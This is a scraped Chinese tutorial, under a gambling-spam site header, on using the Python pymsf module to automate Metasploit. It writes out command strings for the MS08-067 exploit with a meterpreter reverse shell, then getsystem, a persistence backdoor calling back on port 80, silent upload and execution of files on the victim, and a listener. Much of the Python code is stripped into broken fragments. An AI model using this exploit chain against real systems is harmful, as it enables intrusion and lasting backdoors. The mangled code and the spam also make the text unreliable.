九五至尊在线娱乐城 - 首页进入
中华币:| 会员登录| 诚信企业查询| 设为九五至尊老九五至尊在线娱乐城ks99信誉第一| 加入收藏
当前位置: 中国商业网 > 互联网 > 网络安全 > 教你用Python玩转神器Metasploit

教你用Python玩转神器Metasploit

时间:2015-06-12 10:43来源:中国商业网 阅读: 次   

pymsf是著名安全研究团队Spiderlabs实现的一个Python与Metasploit msgrpc进行通信的python模块,通过它,你可以利用Python玩转渗透测试框架Metasploit。

教你用Python玩转神器Metasploit

使用步骤

首先你需要先启动msgrpc服务,命令如下:

与msgrpc进行通信其实就是与msfconsole进行通信,首先你需要创建一个msfrpc的类,登录到msgrpc服务器并且创建一个虚拟的终端,然后你就可以在你创建的虚拟终端上面执行多个命令的字符串.你可以调用模块的方法与console.write执行命令,并且通过"console.read"从虚拟终端上面读取输入的值.这篇文章将演示如何使用pymsf模块并且如何开发出一个完整的脚本.

这里有一个函数它创建了一个msfrpc实例,登录到msgrpc服务器,并且创建了一个虚拟终端.

    client      client     ress      console_id 

下一步就是实现把多个字符串发给虚拟终端,通过console.write和console.read在虚拟终端显示与读取:

## Exploit MS08-067 ## commands = """use exploit/windows/smb/ms08_067_netapi set PAYLOAD windows/meterpreter/reverse_tcp set RHOST """""" set LHOST """""" set LPORT """""" set ExitOnSession false exploit -z """RHOST client res  result 

上面的这一小段代码创建了一个MSF的资源文件,这样你就可以通过"resoucen"命令去执行指定文件里面中一系列的命令。

下面我们将通过"getsystem"命令把这个文件的提权,建立一个后门打开80端口来转发.并且永久的运行.最后上传我们的漏洞exp并且在命令模式下面悄悄的安装:

     post       bat       postcomms = """getsystem run persistence -S -U -X -i 10 -p 80 -r """""" cd c:\\ upload /tmp/ms08067_patch.exe c:\\ upload /tmp/ms08067_install.bat c:\\ execute -f ms08067_install.bat """      batcomm       post      post

通过上面的那段代码,将会创建一个.rc的文件.通过msf模块“post/multi/gather/run_console_rc_file”在当前的meterpreter会话中运行生成的文件,并且通过console.write命令从虚拟终端写入数据,通过console.read命令来回显返回内容:

## 运行生成的exp ## runPost = """use post/multi/gather/run_console_rc_file set RESOURCE /tmp/smbpost.rc set SESSION """""" exploit """      RHOST      client      rres       sleep      listen = """use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 80 set LHOST """""" exploit """ client lres 

上面代码中的变量(RHOST, LHOST,LPORT等)都是通过optparse模块从命令终端输入的,完整的脚本托管在github上面,有时候你需要知道脚本的生成的地方都是静态地址,不会在其他的目录生成,例如ms08067的补丁就会在你的/tmp/目录下面。

大家只要知道基础然后对下面的代码进行一定的修改就可以编程一个属于你自己的msf自动化攻击脚本,我们建议通过博客里面发表的一些简单的例子出发,然后自己写一个msf攻击脚本:

 subprocess  sleep      post       bat       postcomms = """getsystem run persistence -S -U -X -i 10 -p 80 -r """""" cd c:\\ upload /tmp/ms08067_patch.exe c:\\ upload /tmp/ms08067_install.bat c:\\ execute -f ms08067_install.bat """      batcomm       post      post      client          client         ress          console_id       commands = """use exploit/windows/smb/ms08_067_netapi set PAYLOAD windows/meterpreter/reverse_tcp set RHOST """""" set LHOST """""" set LPORT """""" set ExitOnSession false exploit -z """      RHOST      client      res       result       runPost = """use post/multi/gather/run_console_rc_file set RESOURCE /tmp/smbpost.rc set SESSION """""" exploit """      RHOST      client      rres       sleep      listen = """use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 80 set LHOST """""" exploit """            client      lres       print lres         parser \         ' -p LPORT -r RHOST -l LHOST')         parser \         help          parser \         help         parser \         help      parser \         help             sessionsession      RHOSTLPORT                       usage                 sys      builder      sploiter       main()

【编辑推荐】

【责任编辑:蓝雨泪 TEL:(010)68476606】


    相关文章:

    关于我们 | 联系我们 | 广告服务 | 免责声明 | 隐私保护 | 返回顶部

    Copyright © 2002-2015 www.zgsyw.com 沪ICP备15040724号 中国商业网 上海商也文化传媒有限公司 版权所有